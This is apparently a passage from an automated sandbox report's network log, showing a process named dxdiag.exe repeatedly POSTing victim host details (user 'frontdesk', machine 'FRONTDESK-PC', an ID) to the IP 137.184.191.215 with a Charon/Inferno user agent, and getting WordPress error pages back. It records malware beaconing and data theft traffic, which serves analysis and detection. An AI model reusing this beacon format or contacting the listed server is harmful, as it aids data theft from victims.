                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:44:53.797041893 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                      Oct 1, 2024 07:44:53.797055006 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                      Oct 1, 2024 07:44:53.797070026 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.749716137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:44:53.972467899 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:44:53.977271080 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:44:56.664961100 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:44:54 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:44:56.664989948 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:44:56.665003061 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.749717137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:44:56.826859951 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:44:56.833375931 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:44:59.412662029 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:44:57 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:44:59.412686110 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:44:59.412703037 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.749718137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:44:59.757986069 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:44:59.762868881 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:02.344647884 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:00 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:02.344667912 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:02.344681978 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.749719137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:02.493484974 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:02.498333931 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:05.063132048 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:02 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:05.063153982 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:05.063169003 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.749720137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:05.213504076 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:05.218400955 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:07.848002911 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:05 GMT
                      Server: Apache/2.4.52 (Ubuntu)
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Content-Length: 2557
                      Connection: close
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                      Oct 1, 2024 07:45:07.848023891 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                      Oct 1, 2024 07:45:07.848036051 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.749721137.184.191.215808116C:\Windows\SysWOW64\dxdiag.exe
                      TimestampBytes transferredDirectionData
                      Oct 1, 2024 07:45:07.997737885 CEST243OUTPOST /index.php/10899 HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 137.184.191.215
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F612A844
                      Content-Length: 165
                      Connection: close
                      Oct 1, 2024 07:45:08.004704952 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 30 00 36 00 36 00 36 00 35 00 36 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
                      Data Ascii: (ckav.rufrontdesk066656FRONTDESK-PC0FDD42EE188E931437F4FBE2C
                      Oct 1, 2024 07:45:10.771188021 CEST1236INHTTP/1.0 500 Internal Server Error
                      Date: Tue, 01 Oct 2024 05:45:08 GMT
